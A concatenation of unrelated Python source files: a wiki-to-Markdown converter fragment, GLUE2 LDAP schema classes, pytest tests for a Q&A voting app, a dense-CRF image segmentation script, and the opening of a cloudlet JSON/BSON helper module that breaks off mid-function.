def _HandlePluginWikiToc(self, input_line, match, output_stream):
"""Handle a plugin tag for a wiki table of contents.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
self._warning_method(
input_line,
u"A table of contents plugin was used for this wiki:\n"
"\t{0}\n"
"The Gollum wiki system supports table of content generation.\n"
"See https://github.com/gollum/gollum/wiki for more information.\n"
"It has been removed."
.format(match))
def _HandlePluginEnd(self, input_line, match, output_stream):
"""Handle a plugin ending tag.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
core = match[2:-1]
plugin_id = constants.PLUGIN_ID_RE.match(core).group(0)
if self._plugin_stack and self._plugin_stack[-1]["id"] == plugin_id:
self._plugin_stack.pop()
if plugin_id in self._ALLOWED_HTML_TAGS:
if plugin_id == "code":
self._formatting_handler.HandleCodeBlockClose(
input_line,
output_stream)
else:
self._formatting_handler.HandleHtmlClose(
input_line,
output_stream,
plugin_id)
elif plugin_id == "g:plusone":
self._formatting_handler.HandleGPlusClose(input_line, output_stream)
elif plugin_id == "wiki:comment":
self._formatting_handler.HandleCommentClose(input_line, output_stream)
elif plugin_id == "wiki:gadget":
# A warning was already issued on the opening tag.
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
match)
elif plugin_id == "wiki:video":
self._formatting_handler.HandleVideoClose(input_line, output_stream)
elif plugin_id == "wiki:toc":
# A warning was already issued on the opening tag.
pass
else:
self._warning_method(
input_line,
u"Unknown but matching plugin end was given, outputting "
"as plain text:\n\t{0}".format(match))
# Wiki syntax put this class of error on its own line.
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
u"\n\n{0}\n\n".format(match))
else:
self._warning_method(
input_line,
u"Unknown/unmatched plugin end was given, outputting "
"as plain text with errors:\n\t{0}".format(match))
# Wiki syntax put this class of error on its own line,
# with a prefix error message, and did not display the tag namespace.
tag_without_ns = plugin_id.split(":", 1)[-1]
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
u"\n\nUnknown end tag for </{0}>\n\n".format(tag_without_ns))
def _HandleVariable(self, input_line, match, output_stream):
"""Handle a variable.
Args:
input_line: Current line number being processed.
match: Matched text.
output_stream: Output Markdown file.
"""
output = None
instructions = None
# If the variable is defined somewhere in the plugin stack, use it.
if self._plugin_stack:
value = None
for plugin_info in reversed(self._plugin_stack):
if match in plugin_info["params"]:
value = plugin_info["params"][match]
break
if value:
output = value
# Otherwise, it needs to be globally-defined.
if not output and match == "username":
output = "(TODO: Replace with username.)"
instructions = ("On Google Code this would have been replaced with the "
"username of the current user, but GitHub has no "
"direct support for equivalent behavior. It has been "
"replaced with\n\t{0}\nConsider removing this altogether."
.format(output))
elif not output and match == "email":
output = "(TODO: Replace with email address.)"
instructions = ("On Google Code this would have been replaced with the "
"email address of the current user, but GitHub has no "
"direct support for equivalent behavior. It has been "
"replaced with\n\t{0}\nConsider removing this altogether."
.format(output))
elif not output and match == "project":
if self._project:
output = self._project
instructions = (u"It has been replaced with static text containing the "
"name of the project:\n\t{0}".format(self._project))
else:
output = "(TODO: Replace with project name.)"
instructions = ("Because no project name was specified, the text has "
"been replaced with:\n\t{0}".format(output))
# Not defined anywhere, just treat as regular text.
if not output:
# Add surrounding %% back on.
output = u"%%{0}%%".format(match)
self._formatting_handler.HandleEscapedText(
input_line,
output_stream,
output)
if instructions:
self._warning_method(
input_line,
u"A variable substitution was performed with %%{0}%%. {1}"
.format(match, instructions))
def _HandleTag(self, input_line, tag, output_stream):
"""Handle a tag, which has an opening and closing.
Args:
input_line: Current line number being processed.
tag: The tag to handle.
output_stream: Output Markdown file.
"""
if tag not in self._open_tags:
self._OpenTag(input_line, tag, output_stream)
else:
self._CloseTag(input_line, tag, output_stream)
|
from arcnagios.ldaputils import LDAPObject
import logging
from inspect import isclass
from utils import lazy_staticmethod
log = logging.getLogger(__name__)
MU_1 = 0
MU_01 = 1
MU_SOME = 2
MU_ANY = 3
MU_MINUS = 4
# TODO. Change to MU_SOME when the infosys is ready for it.
MU_SOME_WIP = MU_ANY
def multiplicity_indicator(m):
return {MU_1: '1', MU_01: '0,1', MU_ANY: '*', MU_SOME: '+',
MU_MINUS: '-'}[m]
def matching_multiplicity(mult, n):
if mult == MU_1:
return n == 1
if mult == MU_01:
return n in [0, 1]
if mult == MU_SOME:
return n > 0
if mult == MU_ANY:
return True
# Relation Kinds
ASSOCIATION = 1
AGGREGATION = 2
COMPOSITION = 3
# TODO: The specification of relation of the GLUE2ForeignKey objects may be
# incomplete, unspecified ones default to ASSOCIATION.
class GLUE2ForeignKey(object):
def __init__(self, name, other_class, local_mult, other_mult,
bidirectional = False, dependent_fk_attribute = False,
relation = ASSOCIATION):
self.name = name
self.other_class = other_class
self.local_mult = local_mult
self.other_mult = other_mult
self.bidirectional = bidirectional
self.dependent_fk_attribute = dependent_fk_attribute
self.relation = relation
_fk = GLUE2ForeignKey
# Auxiliary classes to be treated as structual.
glue2_exclusive_auxiliary_objectclasses = {
'GLUE2AdminDomain': 'GLUE2Domain',
'GLUE2UserDomain': 'GLUE2Domain',
'GLUE2AccessPolicy': 'GLUE2Policy',
'GLUE2MappingPolicy': 'GLUE2Policy',
'GLUE2ComputingService': 'GLUE2Service',
'GLUE2ComputingEndpoint': 'GLUE2Endpoint',
'GLUE2ComputingShare': 'GLUE2Share',
'GLUE2ComputingManager': 'GLUE2Manager',
'GLUE2ExecutionEnvironment': 'GLUE2Resource',
'GLUE2ComputingActivity': 'GLUE2Activity',
'GLUE2StorageService': 'GLUE2Service',
'GLUE2StorageEndpoint': 'GLUE2Endpoint',
'GLUE2StorageShare': 'GLUE2Share',
'GLUE2StorageManager': 'GLUE2Manager',
'GLUE2DataStore': 'GLUE2Resource',
}
class GLUE2Entity(LDAPObject):
structural_objectclass = 'GLUE2Entity'
glue2_exclusive_auxiliary_objectclass = None
glue2_really_abstract = False
glue2_primary_key = None
glue2_foreign_keys = lazy_staticmethod(lambda: [])
@classmethod
def glue2_class_name(cls):
return cls.glue2_exclusive_auxiliary_objectclass \
or cls.structural_objectclass
@classmethod
def glue2_check_class(cls):
error_count = 0
log.info('+ Checking class %s.'%cls.__name__)
for fk in cls.glue2_foreign_keys():
log.info('++ Checking FK %s.'%fk.name)
if not fk.dependent_fk_attribute:
if not isinstance(fk.other_class.glue2_primary_key, str):
log.error('Missing primary key for %s'%fk.name)
error_count += 1
if fk.bidirectional:
found = False
for rfk in fk.other_class.glue2_foreign_keys():
if issubclass(cls, rfk.other_class):
found = True
if not found:
log.error('Did not find reverse link for %s'%fk.name)
error_count += 1
if cls.glue2_class_name() != cls.__name__:
log.error('Mismatched class name %s vs %s.'
% (cls.glue2_class_name(), cls.__name__))
error_count += 1
assert error_count == 0
@classmethod
def glue2_all_foreign_keys(cls):
for fk in cls.glue2_foreign_keys():
yield fk
for base in cls.__bases__:
if issubclass(base, GLUE2Entity):
for fk in base.glue2_all_foreign_keys():
yield fk
def glue2_get_fk_links(self, fk):
v = getattr(self, fk.name)
if isinstance(v, list):
return v
elif v is None:
return []
else:
return [v]
class GLUE2Group(GLUE2Entity):
structural_objectclass = 'GLUE2Group'
glue2_primary_key = 'GLUE2GroupID'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2Extension(GLUE2Entity):
structural_objectclass = 'GLUE2Extension'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ExtensionEntityForeignKey', GLUE2Entity, MU_ANY, MU_1,
dependent_fk_attribute = True, relation = COMPOSITION),
])
class GLUE2Location(GLUE2Entity):
structural_objectclass = 'GLUE2Location'
glue2_primary_key = 'GLUE2LocationID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2LocationServiceForeignKey', GLUE2Service, MU_01, MU_ANY),
_fk('GLUE2LocationDomainForeignKey', GLUE2Domain, MU_01, MU_ANY),
])
class GLUE2Contact(GLUE2Entity):
structural_objectclass = 'GLUE2Contact'
glue2_primary_key = 'GLUE2ContactID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ContactServiceForeignKey', GLUE2Service, MU_ANY, MU_ANY),
_fk('GLUE2ContactDomainForeignKey', GLUE2Domain, MU_ANY, MU_ANY),
])
class GLUE2Domain(GLUE2Entity):
structural_objectclass = 'GLUE2Domain'
glue2_primary_key = 'GLUE2DomainID'
glue2_really_abstract = True
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2AdminDomain(GLUE2Domain):
glue2_exclusive_auxiliary_objectclass = 'GLUE2AdminDomain'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2AdminDomainAdminDomainForeignKey', GLUE2AdminDomain,
MU_ANY, MU_01, relation = AGGREGATION),
])
class GLUE2UserDomain(GLUE2Domain):
glue2_exclusive_auxiliary_objectclass = 'GLUE2UserDomain'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2UserDomainUserDomainForeignKey', GLUE2UserDomain,
MU_ANY, MU_01, relation = AGGREGATION),
])
class GLUE2Service(GLUE2Entity):
structural_objectclass = 'GLUE2Service'
glue2_primary_key = 'GLUE2ServiceID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ServiceAdminDomainForeignKey', GLUE2AdminDomain,
MU_ANY, MU_1, relation = AGGREGATION),
_fk('GLUE2ServiceServiceForeignKey', GLUE2Service, MU_ANY, MU_ANY,
bidirectional = True),
])
class GLUE2Endpoint(GLUE2Entity):
structural_objectclass = 'GLUE2Endpoint'
glue2_primary_key = 'GLUE2EndpointID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2EndpointServiceForeignKey', GLUE2Service, MU_ANY, MU_1,
relation = AGGREGATION),
])
class GLUE2Share(GLUE2Entity):
structural_objectclass = 'GLUE2Share'
glue2_primary_key = 'GLUE2ShareID'
glue2_really_abstract = True
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ShareServiceForeignKey', GLUE2Service, MU_ANY, MU_1,
relation = AGGREGATION),
_fk('GLUE2ShareEndpointForeignKey', GLUE2Share, MU_ANY, MU_ANY),
_fk('GLUE2ShareResourceForeignKey', GLUE2Resource, MU_ANY, MU_ANY),
])
class GLUE2Manager(GLUE2Entity):
structural_objectclass = 'GLUE2Manager'
glue2_primary_key = 'GLUE2ManagerID'
glue2_really_abstract = True
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ManagerServiceForeignKey', GLUE2Service, MU_ANY, MU_1,
relation = AGGREGATION),
])
class GLUE2Resource(GLUE2Entity):
structural_objectclass = 'GLUE2Resource'
glue2_primary_key = 'GLUE2ResourceID'
glue2_really_abstract = True
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ResourceManagerForeignKey', GLUE2Manager, MU_ANY, MU_1,
relation = COMPOSITION),
])
class GLUE2Activity(GLUE2Entity):
structural_objectclass = 'GLUE2Activity'
glue2_primary_key = 'GLUE2ActivityID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ActivityUserDomainForeignKey', GLUE2UserDomain,
MU_ANY, MU_01),
_fk('GLUE2ActivityEndpointForeignKey', GLUE2Endpoint, MU_ANY, MU_01),
_fk('GLUE2ActivityShareForeignKey', GLUE2Share, MU_ANY, MU_01),
_fk('GLUE2ActivityResourceForeignKey', GLUE2Resource, MU_ANY, MU_01),
_fk('GLUE2ActivityActivityForeignKey', GLUE2Activity, MU_ANY, MU_ANY,
bidirectional = True)
])
class GLUE2Policy(GLUE2Entity):
structural_objectclass = 'GLUE2Policy'
glue2_primary_key = 'GLUE2PolicyID'
glue2_really_abstract = True
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2PolicyUserDomainForeignKey', GLUE2UserDomain,
MU_ANY, MU_SOME_WIP),
])
class GLUE2AccessPolicy(GLUE2Policy):
glue2_exclusive_auxiliary_objectclass = 'GLUE2AccessPolicy'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2AccessPolicyEndpointForeignKey', GLUE2Endpoint, MU_ANY, MU_1),
])
class GLUE2MappingPolicy(GLUE2Policy):
glue2_exclusive_auxiliary_objectclass = 'GLUE2MappingPolicy'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2MappingPolicyShareForeignKey', GLUE2Share, MU_ANY, MU_1),
])
# Computing Service
# =================
class GLUE2ComputingService(GLUE2Service):
glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingService'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2ComputingEndpoint(GLUE2Endpoint):
glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingEndpoint'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2ComputingShare(GLUE2Share):
glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingShare'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2ComputingManager(GLUE2Manager):
glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingManager'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2Benchmark(GLUE2Entity):
structural_objectclass = 'GLUE2Benchmark'
glue2_primary_key = 'GLUE2BenchmarkID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2BenchmarkComputingManagerForeignKey',
GLUE2ComputingManager, MU_ANY, MU_01),
_fk('GLUE2BenchmarkExecutionEnvironmentForeignKey',
GLUE2ExecutionEnvironment, MU_ANY, MU_01),
])
class GLUE2ExecutionEnvironment(GLUE2Resource):
glue2_exclusive_auxiliary_objectclass = 'GLUE2ExecutionEnvironment'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2ApplicationEnvironment(GLUE2Entity):
structural_objectclass = 'GLUE2ApplicationEnvironment'
glue2_primary_key = 'GLUE2ApplicationEnvironmentID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ApplicationEnvironmentComputingManagerForeignKey',
GLUE2ComputingManager, MU_ANY, MU_1, relation = COMPOSITION),
_fk('GLUE2ApplicationEnvironmentExecutionEnvironmentForeignKey',
GLUE2ExecutionEnvironment, MU_ANY, MU_ANY),
])
class GLUE2ApplicationHandle(GLUE2Entity):
structural_objectclass = 'GLUE2ApplicationHandle'
glue2_primary_key = 'GLUE2ApplicationHandleID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ApplicationHandleApplicationEnvironmentForeignKey',
GLUE2ApplicationEnvironment, MU_ANY, MU_1, relation = COMPOSITION),
])
class GLUE2ComputingActivity(GLUE2Activity):
glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingActivity'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2ToStorageService(GLUE2Entity):
structural_objectclass = 'GLUE2ToStorageService'
glue2_primary_key = 'GLUE2ToStorageServiceID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ToStorageServiceComputingServiceForeignKey',
GLUE2ComputingService, MU_ANY, MU_1),
_fk('GLUE2ToStorageServiceStorageServiceForeignKey',
GLUE2StorageService, MU_MINUS, MU_1),
])
glue2_computing_classes = [
GLUE2ComputingService, GLUE2ComputingEndpoint, GLUE2ComputingShare,
GLUE2ComputingManager, GLUE2Benchmark, GLUE2ExecutionEnvironment,
GLUE2ApplicationEnvironment, GLUE2ApplicationHandle,
GLUE2ComputingActivity, GLUE2ToStorageService
]
# Storage Service
# ===============
class GLUE2StorageService(GLUE2Service):
glue2_exclusive_auxiliary_objectclass = 'GLUE2StorageService'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2StorageServiceCapacity(GLUE2Entity):
structural_objectclass = 'GLUE2StorageServiceCapacity'
glue2_primary_key = 'GLUE2StorageServiceCapacityID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2StorageServiceCapacityStorageServiceForeignKey',
GLUE2StorageService, MU_ANY, MU_1),
])
class GLUE2StorageAccessProtocol(GLUE2Entity):
structural_objectclass = 'GLUE2StorageAccessProtocol'
glue2_primary_key = 'GLUE2StorageAccessProtocolID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2StorageAccessProtocolStorageServiceForeignKey',
GLUE2StorageService, MU_ANY, MU_1, relation = AGGREGATION),
])
class GLUE2StorageEndpoint(GLUE2Endpoint):
glue2_exclusive_auxiliary_objectclass = 'GLUE2StorageEndpoint'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2StorageShare(GLUE2Share):
glue2_exclusive_auxiliary_objectclass = 'GLUE2StorageShare'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2StorageShareCapacity(GLUE2Entity):
structural_objectclass = 'GLUE2StorageShareCapacity'
glue2_primary_key = 'GLUE2StorageShareCapacityID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2StorageShareCapacityStorageShareForeignKey',
GLUE2StorageShare, MU_ANY, MU_1, relation = AGGREGATION),
])
class GLUE2StorageManager(GLUE2Manager):
glue2_exclusive_auxiliary_objectclass = 'GLUE2StorageManager'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2DataStore(GLUE2Resource):
glue2_exclusive_auxiliary_objectclass = 'GLUE2DataStore'
glue2_foreign_keys = lazy_staticmethod(lambda: [])
class GLUE2ToComputingService(GLUE2Entity):
structural_objectclass = 'GLUE2ToComputingService'
glue2_primary_key = 'GLUE2ToComputingServiceID'
glue2_foreign_keys = lazy_staticmethod(lambda: [
_fk('GLUE2ToComputingServiceStorageAccessProtocolForeignKey',
GLUE2StorageAccessProtocol, MU_ANY, MU_ANY),
_fk('GLUE2ToComputingServiceComputingServiceForeignKey',
GLUE2ComputingService, MU_MINUS, MU_1),
_fk('GLUE2ToComputingServiceStorageServiceForeignKey',
GLUE2StorageService, MU_MINUS, MU_1),
])
glue2_storage_classes = [
GLUE2StorageService, GLUE2StorageServiceCapacity,
GLUE2StorageAccessProtocol, GLUE2StorageEndpoint,
GLUE2StorageShare, GLUE2StorageShareCapacity, GLUE2StorageManager,
GLUE2DataStore, GLUE2ToComputingService
]
# Costructor Dispatcher
# =====================
glue2_entity_classes = \
filter(lambda c: isclass(c) and issubclass(c, GLUE2Entity),
globals().itervalues())
glue2_entity_class_map = \
dict((c.glue2_class_name(), c) for c in glue2_entity_classes)
def construct_from_ldap_entry(subschema, dn, ent):
ocs = set(ent['objectClass'])
exauxes = ocs.intersection(glue2_exclusive_auxiliary_objectclasses)
if len(exauxes) > 1:
raise ValueError('Mixing exclusive auxiliary classes %s.'
% ', '.join(exauxes))
if len(exauxes) == 1:
class_name = exauxes.pop()
base_class_name = glue2_exclusive_auxiliary_objectclasses[class_name]
if not base_class_name in ocs:
raise ValueError(
'%s should be considered a structural subclass of %s.'
%(class_name, base_class_name))
else:
class_name = ent['structuralObjectClass'][0]
c = glue2_entity_class_map.get(class_name)
if c:
return c(subschema, dn, ent)
# Validation of Classes
# =====================
# To validate the classes and dump a diagram to tmp.glue2.*, use
# python -c 'from arcnagios.glue2 import check_classes; check_classes()'
def check_classes():
def nodename(s):
s = s.startswith('GLUE2') and s[5:] or s
return s
def fklabel(cn, s):
if not s.endswith('ForeignKey'):
log.error('%s should end with "ForeignKey"')
return s
if not s.startswith(cn):
log.error('%s should start with %s'%(s, cn))
return '"%s"'%nodename(s)
s = s[:-10] + 'FK'
return '"%s-\\n%s"'%(nodename(cn), s[len(cn):])
logging.basicConfig(loglevel = logging.INFO)
dot_out = open('tmp.glue2.dot', 'w')
dot_out.write('digraph {\n'
' rankdir = "BT";\n'
' edge [arrowsize=1.2, fontsize=13, labelfontsize=15];\n')
if False:
dot_out.write(' subgraph cluster_computing {%s;}\n'
% '; '.join(c.glue2_class_name() for c in glue2_computing_classes))
dot_out.write(' subgraph cluster_storage {%s;}\n'
% '; '.join(c.glue2_class_name() for c in glue2_storage_classes))
for c in glue2_entity_classes:
c.glue2_check_class()
if not c is GLUE2Entity:
for cp in c.__subclasses__():
dot_out.write(' %s -> %s;\n'
%(nodename(cp.glue2_class_name()),
nodename(c.glue2_class_name())))
for fk in c.glue2_foreign_keys():
cp = fk.other_class
dot_out.write(' %s -> %s [arrowhead=odiamond, label=%s, '
'taillabel="%s", headlabel="%s"];\n'
%(nodename(c.glue2_class_name()),
nodename(cp.glue2_class_name()),
fklabel(c.glue2_class_name(), fk.name),
multiplicity_indicator(fk.local_mult),
multiplicity_indicator(fk.other_mult)))
dot_out.write('}\n')
dot_out.close()
import os
return os.system('dot -T svg -o tmp.glue2.svg tmp.glue2.dot')
|
import pytest
from ...app.models import Question, Answer, Upvote, Downvote
from ...app.schemas.answer import AnswerSchema
from ..factories import UserFactory
@pytest.mark.usefixtures('db', 'user')
class TestQuestion:
"""Test answer model"""
def test_create_answer_and_relationship(self, db, user):
_user_question = user.get()
_user_anwswer = UserFactory(username="user_answer", email="user_answer@gmail.com")
question = Question(id_user=_user_question.id, text="What is the life?")
db.session.add(question)
db.session.commit()
answer = Answer(_user_anwswer.id, question.id, "Answer?")
db.session.add(answer)
db.session.commit()
assert Answer.query.count() == 1
def test_upvote(self, db, user):
_user = user.get()
question = Question(id_user=_user.id, text="What is the life?")
db.session.add(question)
db.session.commit()
_user_anwswer = UserFactory(username="user_answer", email="user_answer@gmail.com")
db.session.commit()
answer = Answer(_user_anwswer.id, question.id, "Answer?")
db.session.add(answer)
db.session.commit()
user1 = UserFactory(username="userLike1", email="userLike1@gmail.com")
user2 = UserFactory(username="userLike2", email="userLike2@gmail.com")
db.session.commit()
answer.upvote.append(Upvote(id_user=user1.id))
answer.upvote.append(Upvote(id_user=user2.id))
db.session.commit()
assert answer.upvote_count == 2
assert answer.downvote_count == 0
def test_downvote(self, db, user):
_user = user.get()
question = Question(id_user=_user.id, text="What is the life?")
db.session.add(question)
db.session.commit()
_user_anwswer = UserFactory(username="user_answer", email="user_answer@gmail.com")
db.session.commit()
answer = Answer(_user_anwswer.id, question.id, "Answer?")
db.session.add(answer)
db.session.commit()
user1 = UserFactory(username="user__1", email="user__1@gmail.com")
user2 = UserFactory(username="user__2", email="user__2@gmail.com")
user3 = UserFactory(username="user__3", email="user__3@gmail.com")
db.session.commit()
answer.downvote.append(Downvote(id_user=user1.id))
answer.downvote.append(Downvote(id_user=user2.id))
answer.downvote.append(Downvote(id_user=user3.id))
db.session.commit()
assert answer.downvote_count == 3
assert answer.upvote_count == 0
def test_check_not_error_if_question_and_answer_have_votes(self, db, user):
_user = user.get()
question = Question(id_user=_user.id, text="What is the life?")
db.session.add(question)
db.session.commit()
_user_anwswer = UserFactory(username="user_answer", email="user_answer@gmail.com")
db.session.commit()
answer = Answer(_user_anwswer.id, question.id, "Answer?")
db.session.add(answer)
db.session.commit()
user1 = UserFactory(username="user__1", email="user__1@gmail.com")
user2 = UserFactory(username="user__2", email="user__2@gmail.com")
user3 = UserFactory(username="user__3", email="user__3@gmail.com")
user4 = UserFactory(username="user__4", email="user__4@gmail.com")
user5 = UserFactory(username="user__5", email="user__5@gmail.com")
db.session.commit()
answer.downvote.append(Downvote(id_user=user1.id))
answer.downvote.append(Downvote(id_user=user2.id))
answer.downvote.append(Downvote(id_user=user3.id))
answer.upvote.append(Upvote(id_user=user1.id))
answer.upvote.append(Upvote(id_user=user2.id))
question.upvote.append(Upvote(id_user=user2.id))
question.upvote.append(Upvote(id_user=user5.id))
question.upvote.append(Upvote(id_user=user4.id))
question.upvote.append(Upvote(id_user=user3.id))
question.downvote.append(Downvote(id_user=user1.id))
question.downvote.append(Downvote(id_user=user2.id))
db.session.commit()
assert answer.downvote_count == 3
assert answer.upvote_count == 2
assert question.downvote_count == 2
assert question.upvote_count == 4
def test_serialization_with_marshmallow(self, db, user):
_user = user.get()
question = Question(id_user=_user.id, text="What is the life?")
db.session.add(question)
db.session.commit()
_user_anwswer = UserFactory(username="user_answer", email="user_answer@gmail.com")
db.session.commit()
answer = Answer(_user_anwswer.id, question.id, "Answer?")
db.session.add(answer)
db.session.commit()
user1 = UserFactory(username="user__1", email="user__1@gmail.com")
user2 = UserFactory(username="user__2", email="user__2@gmail.com")
user3 = UserFactory(username="user__3", email="user__3@gmail.com")
db.session.commit()
answer.downvote.append(Downvote(id_user=user1.id))
answer.downvote.append(Downvote(id_user=user2.id))
answer.downvote.append(Downvote(id_user=user3.id))
answer.upvote.append(Upvote(id_user=user1.id))
answer.upvote.append(Upvote(id_user=user2.id))
db.session.commit()
answer_schema = AnswerSchema()
answer_serialized = answer_schema.dump(answer).data
assert answer_serialized['upvote_count'] == 2
assert answer_serialized['downvote_count'] == 3
assert answer_serialized['id_question'] == question.id
assert answer_serialized['text'] == "Answer?"
assert answer_serialized['user']['id'] == _user_anwswer.id
assert answer_serialized['user']['username'] == _user_anwswer.username
assert answer_serialized['user']['email'] == _user_anwswer.email |
import pydensecrf.densecrf as dcrf
import numpy as np
import sys
from skimage.io import imread, imsave
from pydensecrf.utils import unary_from_labels, create_pairwise_bilateral, create_pairwise_gaussian, unary_from_softmax
from os import listdir, makedirs
from os.path import isfile, join
img = imread('00006.jpg')
anno_rgb = imread('00006_anno.jpg').astype(np.uint32)
min_val = np.min(anno_rgb.ravel())
max_val = np.max(anno_rgb.ravel())
out = (anno_rgb.astype('float') - min_val) / (max_val - min_val)
labels = np.zeros((2, img.shape[0], img.shape[1]))
labels[1, :, :] = out
labels[0, :, :] = 1 - out
colors = [0, 255]
colorize = np.empty((len(colors), 1), np.uint8)
colorize[:,0] = colors
n_labels = 2
crf = dcrf.DenseCRF(img.shape[1] * img.shape[0], n_labels)
U = unary_from_softmax(labels)
crf.setUnaryEnergy(U)
feats = create_pairwise_gaussian(sdims=(3, 3), shape=img.shape[:2])
crf.addPairwiseEnergy(feats, compat=3,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# This creates the color-dependent features and then add them to the CRF
feats = create_pairwise_bilateral(sdims=(50, 50), schan=(10, 10, 10),
img=img, chdim=2)
crf.addPairwiseEnergy(feats, compat=5,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
Q = crf.inference(5)
MAP = np.argmax(Q, axis=0)
MAP = colorize[MAP]
imsave('seg.jpg', MAP.reshape(anno_rgb.shape))
|
# KVM-based Discoverable Cloudlet (KD-Cloudlet)
# Copyright (c) 2015 Carnegie Mellon University.
# All Rights Reserved.
#
# THIS SOFTWARE IS PROVIDED "AS IS," WITH NO WARRANTIES WHATSOEVER. CARNEGIE MELLON UNIVERSITY EXPRESSLY DISCLAIMS TO THE FULLEST EXTENT PERMITTEDBY LAW ALL EXPRESS, IMPLIED, AND STATUTORY WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT OF PROPRIETARY RIGHTS.
#
# Released under a modified BSD license, please see license.txt for full terms.
# DM-0002138
#
# KD-Cloudlet includes and/or makes use of the following Third-Party Software subject to their own licenses:
# MiniMongo
# Copyright (c) 2010-2014, Steve Lacy
# All rights reserved. Released under BSD license.
# https://github.com/MiniMongo/minimongo/blob/master/LICENSE
#
# Bootstrap
# Copyright (c) 2011-2015 Twitter, Inc.
# Released under the MIT License
# https://github.com/twbs/bootstrap/blob/master/LICENSE
#
# jQuery JavaScript Library v1.11.0
# http://jquery.com/
# Includes Sizzle.js
# http://sizzlejs.com/
# Copyright 2005, 2014 jQuery Foundation, Inc. and other contributors
# Released under the MIT license
# http://jquery.org/license
__author__ = 'jdroot'
json_lib = True
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
json_lib = False
from bson.py3compat import PY3, binary_type, string_types
import bson
from bson import RE_TYPE
from bson.binary import Binary
from bson.code import Code
from bson.dbref import DBRef
from bson.max_key import MaxKey
from bson.min_key import MinKey
from bson.objectid import ObjectId
from bson.timestamp import Timestamp
import base64
import calendar
import datetime
import re
from pymongo.cursor import Cursor
import urllib
#############################################################################################################
# Decodes a URL encoded body with json data, parsing it and putting it into a dict.
#############################################################################################################
def encoded_json_to_dict(url_encoded_data):
parsed_json_string = urllib.unquote(url_encoded_data)
if parsed_json_string.endswith("="):
parsed_json_string = parsed_json_string[:-1]
fields = json.loads(parsed_json_string)
return fields
def asjson2(func):
def _func(*args, **kwargs):
return func(*args, **kwargs)
return _func
def asjson(f):
# Handler to handle the result
def _handler(ret):
# We need to wrap cursor in dict if it is the only item
if isinstance(ret, Cursor):
ret = {ret.collection.name: ret}
return dumps(ret)
# If f is a function, we must return a callable function
if hasattr(f, '__call__'):
def _asjson(*args, **kwargs):
# Get the functions code
co = f.func_code
# Check if the function has a kwargs argument.
# We cannot just check the name because it could be anything
# which means we have to check the flags. 0x08 is set if keywords is set
varkeywords = co.co_flags & 0x08 > 0
# If we do not have a kwargs arg we need to strip the passed in kwargs so it matches
if not varkeywords:
names = co.co_varnames
_kwargs = {}
for name in names:
if name in kwargs:
_kwargs[name] = kwargs[name]
kwargs = _kwargs
return _handler(f(*args, **kwargs))
return _asjson
else: # Otherwise, just handle the result
return _handler(f)
def obj_to_dict(obj):
ret = obj
if hasattr(ret, 'external'):
if hasattr(ret.external, '__call__'):
ret = ret.external()
return ret
def dumps(obj, *args, **kwargs):
"""Helper function that wraps :class:`json.dumps`.
Recursive function that handles all BSON types including
:class:`~bson.binary.Binary` and :class:`~bson.code.Code`.
"""
if not json_lib:
raise Exception("No json library available")
return json.dumps(_json_convert(obj), *args, **kwargs)
def _json_convert(obj):
"""Recursive helper method that converts BSON types so they can be
converted into json.
"""
# Filters on external
obj = obj_to_dict(obj)
if hasattr(obj, 'iteritems') or hasattr(obj, 'items'): # PY3 support
